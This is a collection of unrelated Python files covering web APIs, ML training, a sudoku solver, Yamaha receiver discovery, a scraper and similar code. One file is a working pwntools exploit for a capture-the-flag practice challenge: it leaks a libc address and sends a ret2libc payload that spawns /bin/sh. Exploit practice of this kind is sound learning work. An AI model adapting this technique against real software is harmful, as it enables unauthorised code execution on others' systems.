vehicles.pilots = request.json.get("pilots")
db.session.add(vehicles)
db.session.commit()
return jsonify(vehicles.serialize()), 200
if __name__ == "__main__":
app.run(host='localhost', port=8080)
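# A hedged client sketch for the endpoints above (field names taken from the
# POST handlers; assumes the server is running on localhost:8080):
# import requests
# requests.post('http://localhost:8080/user', json={
#     'user_name': 'luke', 'first_name': 'Luke', 'last_name': 'Skywalker',
#     'password': 'secret', 'email': 'luke@example.com'})
# print(requests.get('http://localhost:8080/user').json())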
|
# import json library for json file loading and dumping
import json
# Import custom errors, IO logger, and client models
from .ClientDAO import ClientDAO
from .Client import Client, requires_client
from error.Error import ClientSetupError
from logger.Logger import Logger
log = Logger(__name__)
class ClientDAOJSON(ClientDAO):
"""
JSON access object
"""
def __init__(self, vault_file):
"""
vault_file : path to json vault file
"""
self.vault_file = vault_file
log_prefix = "instantiated ClientDAO for json file at: "
log.log_debug(log_prefix + vault_file)
def get_clients(self):
"""
returns a list of clients in the vault
"""
# Load client dictionaries from the json vault file
with open(self.vault_file, 'r') as f:
client_dicts = json.load(f)
# Create list of clients from client dictionaries
clients = []
for client_dict in client_dicts: # avoid shadowing the builtin 'dict'
new_client = Client()
new_client.__dict__ = client_dict
clients.append(new_client)
log.log_debug("pulled list of Clients: " + str(clients))
return clients
@requires_client
def add_client(self, new_client):
"""
adds a client to the vault unless that client is already in the vault
clients are uniquely identified by username so even if two clients with
the same username have different passwords they are still considered
the same
can raise a ClientSetupError if a client with the same username already
exists
"""
# get a list of clients
clients = self.get_clients()
# check if the client is already in the vault before adding
if new_client in clients:
log.log_error("ClientSetupError: Client with same username already exists")
raise ClientSetupError('Client with same username already exists')
else:
clients.append(new_client)
# write the updated vault list to the vault
client_dicts = [client.__dict__ for client in clients]
with open(self.vault_file, 'w') as f:
json.dump(client_dicts, f, indent=4)
log.log_debug("added {0} to {1}".format(str(new_client), str(clients)))
@requires_client
def update_client(self, client):
"""
changes a client in the vault unless a client with the same username as
new_client already exists
always deletes old client
clients are uniquely identified by username so even if two clients with
the same username have different passwords they are still considered
the same
"""
# get a list of clients
clients = self.get_clients()
# remove old client
clients.remove(client)
# append updated client
clients.append(client)
# write the updated vault list to the vault
client_dicts = [client.__dict__ for client in clients]
with open(self.vault_file, 'w') as f:
json.dump(client_dicts, f, indent=4)
log.log_debug("updated {0}".format(str(client)))
@requires_client
def delete_client(self, client):
"""
deletes client from vault
clients are uniquely identified by username so even if two clients with
the same username have different passwords they are still considered
the same
"""
# get a list of clients
clients = self.get_clients()
# remove client
clients.remove(client)
# write the updated vault list to the vault
client_dicts = [client.__dict__ for client in clients]
with open(self.vault_file, 'w') as f:
json.dump(client_dicts, f, indent=4)
log.log_debug("deleted {0}".format(str(client)))
def clear_clients(self):
"""
clear vault contents
"""
# Write a blank list to the vault
cleared_vault = []
with open(self.vault_file, 'w') as f:
json.dump(cleared_vault, f, indent=4)
log.log_debug("cleared vault")
|
# Python Imports
import traceback
from threading import Thread
from datetime import datetime
import socket
from collections import *
# Local Imports
import globals
import yamaha
def setup_ip(self):
"""
If auto detect ip is enabled, this function will attempt to configure the ip
address, otherwise if static ip is enabled, this function will
verify whether a yamaha receiver can be found at the given static ip.
"""
if self.ip_auto_detect:
print "Searching for Yamaha Recievers ({0})...".format(self.auto_detect_model)
ip = auto_detect_ip_threaded(self)
if ip is not None:
self.ip_address = ip
return ip
else:
try:
model = yamaha.get_config_string(self, 'Model_Name', timeout=self.auto_detect_timeout, ip=self.ip_address, print_error=False)
print "Found Yamaha Receiver: {0} [{1}]".format(self.ip_address, model)
return self.ip_address
except:
eg.PrintError("Yamaha Receiver Not Found [{0}]!".format(self.ip_address))
return None
def get_lan_ip():
"""
Attempts to open a socket connection to Google's DNS
servers in order to determine the local IP address
of this computer. Eg, 192.168.1.100
"""
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8",80))
ip = s.getsockname()[0]
s.close()
return ip
except:
return "192.168.1.100"
def get_network_prefix():
"""
Returns the network prefix, which is the local IP address
without the last segment, Eg: 192.168.1.100 -> 192.168.1
"""
lan_ip = get_lan_ip()
return lan_ip[:lan_ip.rfind('.')]
def auto_detect_ip_threaded(self):
"""
Blasts the network with requests, attempting to find any and all yamaha receivers
on the local network. First it detects the user's local ip address, eg 192.168.1.100.
Then, it converts that to the network prefix, eg 192.168.1, and then sends a request
to every ip on that subnet, eg 192.168.1.1 -> 192.168.1.254. It does each request on
a separate thread in order to avoid waiting for the timeout for every 254 requests
one by one.
"""
self.FOUND_IP = None
threads = []
# Get network prefix (eg 192.168.1)
net_prefix = get_network_prefix()
ip_range = create_ip_range(net_prefix + '.1', net_prefix + '.254')
for ip in ip_range:
t = Thread(target=try_connect, kwargs={'self':self, 'ip':ip})
t.daemon = True
threads.append(t)
t.start()
for t in threads:
if self.FOUND_IP is not None:
break
else:
t.join()
if self.FOUND_IP is not None:
print "Found Yamaha Receiver IP: {0} [{1}]".format(self.FOUND_IP, self.MODEL)
else:
eg.PrintError("Yamaha Receiver Was Not Found!")
return self.FOUND_IP
def try_connect(self, ip):
"""
Used with the auto-detect-ip functions, determines if a yamaha receiver is
waiting at the other end of the given ip address.
"""
#print "value in self.active_zone " + str(self.active_zone)
#print "try connect " + ip
try:
model = yamaha.get_config_string(self,'Model_Name', timeout=self.auto_detect_timeout, ip=ip, print_error=False)
print '{0}: {1}'.format(ip, model)
if self.auto_detect_model in ["ANY", "", None] or model.upper() == self.auto_detect_model.upper():
self.FOUND_IP = ip
self.MODEL = model
except:
pass
def create_ip_range(range_start, range_end):
"""
Given a start ip, eg 192.168.1.1, and an end ip, eg 192.168.1.254,
generate a list of all of the ips within that range, including
the start and end ips.
"""
ip_range = []
start = int(range_start[range_start.rfind('.')+1:])
end = int(range_end[range_end.rfind('.')+1:])
for i in range(start, end+1):
ip = range_start[:range_start.rfind('.')+1] + str(i)
ip_range.append(ip)
return ip_range
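# A minimal usage sketch:
# create_ip_range('192.168.1.1', '192.168.1.3')
# -> ['192.168.1.1', '192.168.1.2', '192.168.1.3']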
def convert_zone_to_int(self, zone, convert_active=False):
"""
Convert a zone name into the integer value that it represents:
Examples:
Active Zone: -1
Main Zone: 0
Zone 2: 2
Zone A: -65 (this is the negative version of the integer that represents this letter: 'A' -> 65, thus -65)
"""
if zone == 'Main Zone' or zone == 'Main_Zone' or zone == 'MZ':
return 0
elif 'active' in zone.lower():
# -1 means active zone
if convert_active:
return self.active_zone
else:
return -1
else:
z = zone.replace('Zone_', '').replace('Zone', '').replace('Z', '').strip()
if z in [ 'A', 'B', 'C', 'D' ]:
return -1 * ord(z)
return int(z)
def open_to_close_tag(tag):
"""
Given an opening xml tag, return the matching close tag
eg. '<YAMAHA_AV cmd="PUT"> becomes </YAMAHA_AV>
"""
index = tag.find(' ')
if index == -1:
index = len(tag) - 1
return '</' + tag[1:index] + '>'
def close_xml_tags(xml):
"""
Automagically takes an input xml string and returns that string
with all of the xml tags properly closed. It can even handle when
the open tag is in the middle of the string and not the end.
"""
output = []
stack = []
xml_chars = deque(list(xml))
c = None
while len(xml_chars) > 0:
while len(xml_chars) > 0 and c != '<':
c = xml_chars.popleft()
if c != '<':
output.append(c)
if c == '<':
temp = [ '<' ]
c = xml_chars.popleft()
end_tag = c == '/'
while c != '>':
temp.append(c)
c = xml_chars.popleft()
temp.append('>')
tag = ''.join(temp)
if end_tag:
other_tag = stack.pop()
other_close_tag = open_to_close_tag(other_tag)
while other_close_tag != tag:
output.append(other_close_tag)
other_tag = stack.pop()
other_close_tag = open_to_close_tag(other_tag)
elif not tag.endswith('/>'):
# Only add to stack if not self-closing
stack.append(tag)
output.append(tag)
while len(stack) > 0:
tag = stack.pop()
output.append(open_to_close_tag(tag))
return ''.join(output)
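# A minimal usage sketch; attributes are stripped when the close tags are generated:
# close_xml_tags('<YAMAHA_AV cmd="GET"><Main_Zone><Power>')
# -> '<YAMAHA_AV cmd="GET"><Main_Zone><Power></Power></Main_Zone></YAMAHA_AV>'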
def setup_availability(self, **kwargs):
"""
Query the receiver to see which zones and inputs it supports.
Should be called after a successful ip check.
"""
xmldoc = yamaha.get_system_config(self, **kwargs)
zones = []
inputs = []
for node in xmldoc.getElementsByTagName("Feature_Existence"): #just in case there are multiple "Feature" sections
x = 0
stop = False
while stop==False:
try:
if node.childNodes[x].firstChild.data != "0":
if node.childNodes[x].tagName != "Main_Zone" and node.childNodes[x].tagName[:4] != "Zone":
inputs.append(str(node.childNodes[x].tagName))
else:
zones.append(str(node.childNodes[x].tagName))
except:
stop=True
x = x + 1
self.AVAILABLE_FEATURE_SOURCES = list(inputs)
self.AVAILABLE_INFO_SOURCES = list(inputs)
#models from RX-V use this
x = 0
for node in xmldoc.getElementsByTagName("Input"):
stop = False
while stop==False:
try:
self.AVAILABLE_SOURCES_RENAME.append([str(node.childNodes[x].tagName), str(node.childNodes[x].firstChild.data)])
self.AVAILABLE_INPUT_SOURCES.append(str(node.childNodes[x].firstChild.data))
inputs.append(str(node.childNodes[x].firstChild.data))
except:
stop=True
x = x + 1
#models from N-Line use this
if x == 0: #this means the other lookup resulted in nothing
MainInputxmldoc = yamaha.get_main_zone_inputs(self)
x = 0
for node in MainInputxmldoc.getElementsByTagName("Input_Sel_Item"):
stop = False
while stop==False:
try:
self.AVAILABLE_SOURCES_RENAME.append([str(node.childNodes[x].tagName), str(node.childNodes[x].firstChild.data)])
self.AVAILABLE_INPUT_SOURCES.append(str(node.childNodes[x].firstChild.firstChild.data))
inputs.append(str(node.childNodes[x].firstChild.firstChild.data))
except:
stop=True
x = x + 1
self.AVAILABLE_ZONES = [ zone.replace('_', ' ') for zone in zones ]
self.AVAILABLE_SOURCES = [ input.replace('_', ' ') for input in inputs ]
#self.AVAILABLE_SOURCES = list(set(self.AVAILABLE_SOURCES))
tempList =[]
for source in self.AVAILABLE_SOURCES_RENAME:
tempList.append([source[0].replace('_',''),source[1].replace('_','')])
self.AVAILABLE_SOURCES_RENAME = list(tempList)
def get_available_zones(self, include_active, fallback_zones, limit=None):
"""
Returns the zones that are marked as available based on availability, and
optionally includes an active zone. If zone availability info is not present,
this will return fallback_zones. Optionally a limit can be imposed to only show
a certain amount of zones if the code does not support the extra zones yet.
"""
if len(self.AVAILABLE_ZONES) > 0:
if limit is not None and limit < len(self.AVAILABLE_ZONES):
# For example, limit to only 2 zones
zones = [ self.AVAILABLE_ZONES[i] for i in range(limit) ]
else:
# Must use list() to create a copy
zones = list(self.AVAILABLE_ZONES)
if include_active:
return ['Active Zone'] + zones
else:
return zones
else:
return fallback_zones
|
import numpy as np
import numba
# gradients for one element of the loss function's sum, don't call this directly
@numba.jit(nopython=True)
def ABCD_grad(xa, ya, xb, yb, xc, yc, xd, yd, dab, dac, dad, dbc, dbd, dcd, pab):
sum_dist = dab + dac + dad + dbc + dbd + dcd
dr_ab = (dab/sum_dist)
gxA = 2*((pab - dr_ab)/sum_dist) * ((dab/sum_dist) * ((xa-xb)/dab + (xa-xc)/dac + (xa-xd)/dad ) - (xa-xb)/dab )
gyA = 2*((pab - dr_ab)/sum_dist) * ((dab/sum_dist) * ((ya-yb)/dab + (ya-yc)/dac + (ya-yd)/dad ) - (ya-yb)/dab )
gxB = 2*((pab - dr_ab)/sum_dist) * ((dab/sum_dist) * ((xb-xa)/dab + (xb-xc)/dbc + (xb-xd)/dbd ) - (xb-xa)/dab )
gyB = 2*((pab - dr_ab)/sum_dist) * ((dab/sum_dist) * ((yb-ya)/dab + (yb-yc)/dbc + (yb-yd)/dbd ) - (yb-ya)/dab )
gxC = 2*((pab - dr_ab)/sum_dist) * ((dab/sum_dist) * ((xc-xa)/dac + (xc-xb)/dbc + (xc-xd)/dcd ))
gyC = 2*((pab - dr_ab)/sum_dist) * ((dab/sum_dist) * ((yc-ya)/dac + (yc-yb)/dbc + (yc-yd)/dcd ))
gxD = 2*((pab - dr_ab)/sum_dist) * ((dab/sum_dist) * ((xd-xa)/dad + (xd-xb)/dbd + (xd-xc)/dcd ))
gyD = 2*((pab - dr_ab)/sum_dist) * ((dab/sum_dist) * ((yd-ya)/dad + (yd-yb)/dbd + (yd-yc)/dcd ))
return gxA, gyA, gxB, gyB, gxC, gyC, gxD, gyD
# quartet gradients for a 2D projection, Dhd contains the top-right triangle of the HD distances
# the points are named a,b,c and d internally to keep track of who is who
# points shape: (4, 2)
# Dhd shape : (6,)
@numba.jit(nopython=True)
def compute_quartet_grads(points, Dhd):
xa, ya = points[0]
xb, yb = points[1]
xc, yc = points[2]
xd, yd = points[3]
# LD distances, add a small number just in case
d_ab = np.sqrt((xa-xb)**2 + (ya-yb)**2) + 1e-12
d_ac = np.sqrt((xa-xc)**2 + (ya-yc)**2) + 1e-12
d_ad = np.sqrt((xa-xd)**2 + (ya-yd)**2) + 1e-12
d_bc = np.sqrt((xb-xc)**2 + (yb-yc)**2) + 1e-12
d_bd = np.sqrt((xb-xd)**2 + (yb-yd)**2) + 1e-12
d_cd = np.sqrt((xc-xd)**2 + (yc-yd)**2) + 1e-12
# HD distances
pab, pac, pad, pbc, pbd, pcd = Dhd[0], Dhd[1], Dhd[2], Dhd[3], Dhd[4], Dhd[5]
# for each element of the sum: use the same gradient function and just permute the points given in input
gxA, gyA, gxB, gyB, gxC, gyC, gxD, gyD = ABCD_grad(
xa, ya, xb, yb, xc, yc, xd, yd,\
d_ab, d_ac, d_ad, d_bc, d_bd, d_cd,\
pab)
gxA2, gyA2, gxC2, gyC2, gxB2, gyB2, gxD2, gyD2 = ABCD_grad(
xa, ya, xc, yc, xb, yb, xd, yd,\
d_ac, d_ab, d_ad, d_bc, d_cd, d_bd,\
pac)
gxA3, gyA3, gxD3, gyD3, gxC3, gyC3, gxB3, gyB3 = ABCD_grad(
xa, ya, xd, yd, xc, yc, xb, yb,\
d_ad, d_ac, d_ab, d_cd, d_bd, d_bc,\
pad)
gxB4, gyB4, gxC4, gyC4, gxA4, gyA4, gxD4, gyD4 = ABCD_grad(
xb, yb, xc, yc, xa, ya, xd, yd,\
d_bc, d_ab, d_bd, d_ac, d_cd, d_ad,\
pbc)
gxB5, gyB5, gxD5, gyD5, gxA5, gyA5, gxC5, gyC5 = ABCD_grad(
xb, yb, xd, yd, xa, ya, xc, yc,\
d_bd, d_ab, d_bc, d_ad, d_cd, d_ac,\
pbd)
gxC6, gyC6, gxD6, gyD6, gxA6, gyA6, gxB6, gyB6 = ABCD_grad(
xc, yc, xd, yd, xa, ya, xb, yb,\
d_cd, d_ac, d_bc, d_ad, d_bd, d_ab,\
pcd)
gxA = gxA + gxA2 + gxA3 + gxA4 + gxA5 + gxA6
gyA = gyA + gyA2 + gyA3 + gyA4 + gyA5 + gyA6
gxB = gxB + gxB2 + gxB3 + gxB4 + gxB5 + gxB6
gyB = gyB + gyB2 + gyB3 + gyB4 + gyB5 + gyB6
gxC = gxC + gxC2 + gxC3 + gxC4 + gxC5 + gxC6
gyC = gyC + gyC2 + gyC3 + gyC4 + gyC5 + gyC6
gxD = gxD + gxD2 + gxD3 + gxD4 + gxD5 + gxD6
gyD = gyD + gyD2 + gyD3 + gyD4 + gyD5 + gyD6
return gxA, gyA, gxB, gyB, gxC, gyC, gxD, gyD
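# A minimal usage sketch (random data, shapes as documented above):
# pts = np.random.rand(4, 2)    # LD coordinates of one quartet
# dhd = np.random.rand(6)       # HD distances in the order ab, ac, ad, bc, bd, cd
# gxA, gyA, gxB, gyB, gxC, gyC, gxD, gyD = compute_quartet_grads(pts, dhd)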
|
t = int(input())
while t > 0:
n = int(input())
if n == 1:
print(9)
elif n == 2:
print(98)
else:
print("989", end="")
for i in range(1, n - 2):
print((i - 1) % 10, end="")
print() # end the line after the digits
t = t-1
|
def solve(bo):
find=find_empty(bo)
if not find:
return True
else:
row, col= find
for i in range(1, 10):
if valid(bo, i, (row, col)):
bo[row][col]=i
if solve(bo):
return True
bo[row][col]=0
return False
def valid(bo, num, pos):
#check column
for i in range(len(bo)):
if bo[i][pos[1]]==num and pos[0]!=i:
return False
#check row
for i in range(len(bo[0])):
if bo[pos[0]][i]==num and pos[1]!=i:
return False
#check cube
cube_x=pos[1] // 3
cube_y=pos[0] // 3
for i in range(cube_y*3, cube_y*3+3):
for j in range(cube_x*3, cube_x*3+3):
if bo[i][j]==num and (i, j)!=pos:
return False
return True
def find_empty(bo):
for i in range(len(bo)):
for j in range(len(bo[0])):
if bo[i][j]==0:
return (i, j)
return None
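# A minimal usage sketch: solve() backtracks over every cell returned by
# find_empty() and mutates the board in place.
# board = [[0] * 9 for _ in range(9)]   # an all-empty grid is trivially solvable
# if solve(board):
#     for row in board:
#         print(row)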
|
import time
from sklearn.ensemble import BaggingClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.metrics import f1_score
def bootstrap(data_train, data_test, target_train, target_test):
time1 = time.time()
bsclf = BaggingClassifier(
DecisionTreeClassifier(max_depth=5),
n_estimators=10)
print "begin fit"
bsclf.fit(data_train, target_train)
print "end fit"
time2 = time.time()
pred = bsclf.predict(data_test)
print "end pred"
precision = precision_score(target_test, pred)
recall = recall_score(target_test, pred)
f1 = f1_score(target_test, pred)
return [precision, recall, f1, time2-time1]
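# A hedged usage sketch on synthetic binary data (the scores above use the
# default binary averaging, so a two-class problem is assumed):
# from sklearn.datasets import make_classification
# from sklearn.model_selection import train_test_split
# X, y = make_classification(n_samples=500, random_state=0)
# X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.3, random_state=0)
# print bootstrap(X_tr, X_te, y_tr, y_te)   # [precision, recall, f1, fit_time]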
|
import pytest
from ai.backend.client.session import Session
# module-level marker
pytestmark = pytest.mark.integration
@pytest.mark.asyncio
async def test_list_agent():
with Session() as sess:
result = sess.Agent.list_with_limit(1, 0)
assert len(result['items']) == 1
|
import os
import torch
import numpy as np
import argparse
import random
import yaml
from easydict import EasyDict
import gensim
import torch.utils.data as data
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.nn as nn
from tensorboardX import SummaryWriter
import data_helpers
from models.standard import Origin
def generate_list(text_raw):
word_list = []
word = ""
for i in text_raw:
if (i != u" "):
word = word + i
else:
word_list.append(word)
word = ""
word_list.append(word)
return ' '.join(word_list)
def load_text(x_text, name):
text_list = []
for x in x_text:
x_u = str(x)
xlist = generate_list(x_u)
text_list.append(xlist)
max_document_length = max([len(text.split(" ")) for text in text_list])
print("max_document_length in " + name + " set:")
print(max_document_length)
print("using word2vec to embed words in " + name + " set...")
model = gensim.models.KeyedVectors.load_word2vec_format('./alldata/vectors300.txt', binary=False)
print("embedding completed.")
# print(text_list)
all_vectors = []
embeddingUnknown = [0 for i in range(config.embedding_dim)]
if not os.path.exists('./alldata/x_text_' + name + '.npy'):
print("constructing x_text_" + name + "....")
for text in text_list:
this_vector = []
text = text.split(" ")
if len(text) < max_document_length:
text.extend(['<PADDING>'] * (max_document_length - len(text)))
for word in text:
if word in model.index2word:
this_vector.append(model[word])
else:
this_vector.append(embeddingUnknown)
all_vectors.append(this_vector)
print(len(all_vectors))
x_text = np.array(all_vectors)
print("construction completed.")
print("saving x_text_ " + name + "...")
np.save("./alldata/x_text_" + name + ".npy", x_text)
print("x_text saved.")
else:
print("loading x_text_" + name + ".....")
x_text = np.load("./alldata/x_text_" + name + ".npy")
print("x_text_" + name + " loaded.")
return x_text
class ImageFolder(data.Dataset):
def __init__(self, x_text, x_image, x_user, y):
self.x_text = x_text
self.x_image = x_image
self.x_user = x_user
self.y = y
self.x_text = torch.Tensor(self.x_text.astype("float64"))
self.x_image = torch.Tensor(self.x_image.astype("float64"))
self.x_user = torch.Tensor(self.x_user.astype("float64"))
self.y = torch.Tensor(np.array(self.y, dtype="float64"))
def __getitem__(self, index):
return self.x_text[index], self.x_image[index], self.x_user[index], self.y[index]
def __len__(self):
return len(self.x_text)
def data_prepare(config):
train_text, train_image, train_user, train_y = data_helpers.load_data_and_labels(config.train.home_data,
config.train.work_data,
config.train.school_data,
config.train.restaurant_data,
config.train.shopping_data,
config.train.cinema_data,
config.train.sports_data,
config.train.travel_data)
test_text, test_image, test_user, test_y = data_helpers.load_data_and_labels(config.val.home_data,
config.val.work_data,
config.val.school_data,
config.val.restaurant_data,
config.val.shopping_data,
config.val.cinema_data,
config.val.sports_data,
config.val.travel_data)
train_text = load_text(train_text, "train")
test_text = load_text(test_text, "test")
return train_text, test_text, train_image, test_image, train_user, test_user, train_y, test_y
def cal_acc(pred_text, y):
pred_text = (pred_text.numpy() == pred_text.numpy().max(axis=1, keepdims=1)).astype("float64")
pred_text = [np.argmax(item) for item in pred_text]
y = [np.argmax(item) for item in y]
pred_text, y = np.array(pred_text), np.array(y)
per_text = pred_text == y
text_acc = len(per_text[per_text == True]) / len(per_text) * 100
return text_acc
def save_state(state, path, epoch):
print("=> saving checkpoint of epoch " + str(epoch))
torch.save(state, path + 'params_' + str(epoch) + '.pth')
def load_state(path, netF, optimizerF):
if not os.path.isfile(path):
print("=> no checkpoint found at '{}'".format(path))
else:
print("=> loading checkpoint '{}'".format(path))
checkpoint = torch.load(path)
netF.load_state_dict(checkpoint['state_dictF'])
optimizerF.load_state_dict(checkpoint['optimizerF'])
epoch = checkpoint['epoch'] + 1
count = checkpoint['count']
return epoch, count
def main():
global args, config
parser = argparse.ArgumentParser(description='PyTorch for image-user CNN')
parser.add_argument('--config', default='config.yaml')
    parser.add_argument('--resume', default='', type=str, help='path to checkpoint')  # add attribute
    # parser.add_argument('--board_path', default='./board/', help='')  # add attribute
    # parser.add_argument('--board_freq', default=10, help='')  # add attribute
args = parser.parse_args()
with open(args.config) as f:
        config = EasyDict(yaml.safe_load(f))  # safe_load avoids executing arbitrary YAML tags
# assert torch.cuda.is_available()
# device = torch.device("cuda")
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print(config)
print("device:", device)
# random seed setup
print("Random Seed: ", config.seed)
random.seed(config.seed)
torch.manual_seed(config.seed)
torch.cuda.manual_seed(config.seed)
cudnn.benchmark = True
netF = Origin(config)
criterion = nn.CrossEntropyLoss()
netF = netF.to(device)
criterion = criterion.to(device)
optimizerF = optim.Adam(netF.parameters(), lr=config.lr_fusion)
last_epoch = 0
count = 0
if args.resume:
last_epoch, count = load_state(args.resume, netF, optimizerF)
tr_text_emb, test_text_emb, tr_image, test_image, tr_user, test_user, tr_y, test_y = data_prepare(config)
train_dataset = ImageFolder(tr_text_emb, tr_image, tr_user, tr_y)
train_dataloader = data.DataLoader(train_dataset, batch_size=config.batch_size,
shuffle=True, pin_memory=True, num_workers=int(config.workers))
writer = SummaryWriter(config.board_path)
for epoch in range(last_epoch, config.epoch - 1):
for iter, [text, image, user, y] in enumerate(train_dataloader):
netF.train()
netF.zero_grad()
text, image, user, y = text.to(device), image.to(device), user.to(device), y.to(device)
pred = netF(text, image, user)
err_text = criterion(pred, y.argmax(dim=1))
# print("err: ", err_text)
err_text.backward()
optimizerF.step()
count = count + 1
if (iter + 1) % config.board_freq == 0:
writer.add_scalar("Loss", err_text.item(), count)
if (epoch + 1) % config.val_freq == 0:
val(tr_text_emb, test_text_emb, tr_image, test_image, tr_user, test_user, tr_y, test_y, netF.eval(), device,
epoch, writer)
if (epoch + 1) % config.save_freq == 0:
save_state({'state_dictF': netF.state_dict(),
'optimizerF': optimizerF.state_dict(),
'epoch': epoch,
'count': count}, config.fusion_save_path, epoch)
def val(tr_text_emb, val_text_emb, tr_image, val_image, tr_user, val_user, tr_y, val_y, netF, device, epoch, writer):
tr_text = torch.Tensor(np.array(tr_text_emb, dtype="float64"))
tr_image = torch.Tensor(np.array(tr_image, dtype="float64"))
tr_user = torch.Tensor(np.array(tr_user, dtype="float64"))
tr_y = np.array(tr_y, dtype="float64")
val_text = torch.Tensor(np.array(val_text_emb, dtype="float64"))
val_image = torch.Tensor(np.array(val_image, dtype="float64"))
val_user = torch.Tensor(np.array(val_user, dtype="float64"))
val_y = np.array(val_y, dtype="float64")
tr_text, tr_image, tr_user = tr_text.to(device), tr_image.to(device), tr_user.to(device)
val_text, val_image, val_user = val_text.to(device), val_image.to(device), val_user.to(device)
with torch.no_grad():
pred_tr = netF(tr_text, tr_image, tr_user)
pred_val = netF(val_text, val_image, val_user)
tr_text_acc = cal_acc(pred_tr.cpu(), tr_y)
val_text_acc = cal_acc(pred_val.cpu(), val_y)
print("epoch " + str(epoch), " fusion accuracy | train: %.3f %% | test: %.3f %% " % (tr_text_acc, val_text_acc))
writer.add_scalar("train_accuracy", tr_text_acc, epoch)
writer.add_scalar("val_accuracy", val_text_acc, epoch)
if __name__ == "__main__":
main()
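# A config.yaml sketch matching the keys this script reads; every value below
# is an illustrative assumption, not the author's actual configuration:
#   seed: 1
#   lr_fusion: 0.001
#   batch_size: 32
#   workers: 4
#   epoch: 100
#   embedding_dim: 300
#   board_freq: 10
#   val_freq: 5
#   save_freq: 10
#   board_path: ./board/
#   fusion_save_path: ./checkpoints/
#   train: {home_data: ..., work_data: ..., school_data: ..., restaurant_data: ...,
#           shopping_data: ..., cinema_data: ..., sports_data: ..., travel_data: ...}
#   val: {home_data: ..., work_data: ..., school_data: ..., restaurant_data: ...,
#         shopping_data: ..., cinema_data: ..., sports_data: ..., travel_data: ...}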
|
import re
from django import forms
from django.http import QueryDict
from django.utils.translation import ugettext_lazy as _
from ..models import artist
import datetime
from django.conf import settings
from application.library.viewer import *
class Form(forms.Form):
name = forms.CharField(required=True,widget=forms.TextInput(attrs=dict({"class":"form-control"})),label=_("Artist Name: "))
def clean(self):
error_lst = []
if 'name' in self.cleaned_data:
            if self.cleaned_data["name"] == "" or self.cleaned_data["name"] is None:
error_lst.append("Please enter Artist name")
return error_lst
def getData(self,request):
data = request.GET
if 'id' in data or request.is_ajax():
d = {}
artistData = None
if 'id' in data:
artistData = artist.objects.filter(activeyn=1, id = data['id'])
elif 'term' in data:
artistData = artist.objects.filter(activeyn=1, name__startswith=data['term'])
else:
artistData = artist.objects.filter(activeyn=1)
if len(artistData) == 1 and 'id' in data:
d = {'id': int(artistData[0].id),'name': artistData[0].name}
elif 'term' in data:
d = [{'id': qx.id, 'label': qx.name, 'value': qx.name} for qx in artistData]
else:
d = [{'id':int(item.id), 'name': item.name} for item in artistData]
context = {'data': d}
else:
artist_list = None
artist_list = page(artist.objects.filter(activeyn=1).order_by("-id"), data['page'] if 'page' in data else 1)
context = {'data': artist_list}
return context
def postData(self,request):
data = request.POST
self.cleaned_data = data
if len(self.clean()) <= 0:
newArtist = artist(name=data["name"], activeyn=1, cover_image='', updated_at=str(datetime.datetime.now()))
newArtist.save()
context = {'data': str(newArtist), 'message': 'Record added', 'status': 200}
else:
context = {'invalid': self.clean(), 'message': 'Record not saved', 'status': 422}
return context
def putData(self,request):
data = QueryDict(request.body)
self.cleaned_data = data
if len(self.clean()) <= 0:
myArtist = artist.objects.filter(id=data["id"])
myArtist.update(name=data["name"], cover_image='')
context = {'data': str(myArtist), 'message': 'Data has been updated', 'status': 200}
else:
context = {'invalid': self.clean(), 'message': 'Record not saved', 'status': 422}
return context
def deleteData(self,request):
data = QueryDict(request.body)
myArtist = artist.objects.filter(id=data["id"])
myArtist.update(activeyn=0)
context = {'message': 'Selected artist has been deleted !', 'status': 200}
return context
|
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
from pwn import *
#context.log_level = 'debug'
elf = ELF('./dubblesort')
libc = ELF('./libc_32.so.6')
# Memory locations
bin_sh = elf.bss() + 0x100
# Byte sequence alias
A4 = 4 * b'A'
def main():
proc = remote('chall.pwnable.tw', 10101)
#proc = process(['./ld_32-2.23.so', './dubblesort'], env={'LD_PRELOAD': './libc_32.so.6'})
# Develop your exploit here
proc.recvuntil('What your name :')
    proc.send(A4 * 6 + b'A') # extra A to overwrite the terminating \x00 byte
proc.recvuntil('Hello ' + 'AAAA' * 6)
libc_data = u32(proc.recv(4)) - ord('A')
libc_base = libc_data - (0xf7fc1000 - 0xf7e11000)
libc_system = libc_base + libc.sym['system']
libc_bin_sh = libc_base + list(libc.search(b'/bin/sh'))[0]
log.info('libc data start: {}'.format(hex(libc_data)))
log.info('libc base: {}'.format(hex(libc_base)))
log.info('system@libc: {}'.format(hex(libc_system)))
log.info('bin_sh@libc: {}'.format(hex(libc_bin_sh)))
proc.recvuntil('sort :')
proc.sendline(str(35).encode())
# We must make sure our payload will remain
# in the correct order after being sorted.
payload = [0x30678 if i < 24 else 0xf0000000 for i in range(32)]
payload.append(libc_system) # ret
payload.append(libc_bin_sh) # system()'s ret addr
payload.append(libc_bin_sh) # system()'s 1st arg
for i in range(35):
proc.recvuntil('number : ')
proc.sendline(b'+' if i == 24 else str(payload[i]).encode())
proc.interactive()
if __name__ == '__main__':
main()
|
from urllib2 import urlopen
#from bs4 import BeautifulSoup
import requests
import time
import os
from urlparse import unquote
from unidecode import unidecode
f = open("/home/ubuntu/pageedits/SPARK_AGG_VIEWS/Month/part-00000",'r')
lines = f.readlines()
article_list = []
not_found_list = []
for line in lines:
line = line.strip().split(',')
if line[0]:
#article_list.append(line[0][3:-1])
article = line[0][2:-1]
article = article.replace('/',"")
article_list.append(article)
cnt = 0
for article in article_list:
r = requests.get("https://tools.wmflabs.org/xtools-articleinfo/?article=%s&project=en.wikipedia.org"%(article))
if r.status_code == 200:
try:
with open('./Agg_scrapped_articles_dir/'+article+'.html','w') as outfile:
outfile.write(unicode(r.content, errors='ignore'))
cnt += 1
except IOError:
pass
elif r.status_code == 404:
not_found_list.append(article)
time.sleep(1)
if cnt == 100000:
break
with open('./Agg_scrapped_articles_dir/'+'not_found.txt','w') as outfile2:
    # record every article that came back with a 404
    outfile2.write("\n".join(not_found_list))
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import sys, time
from PyQt4 import QtCore, QtGui
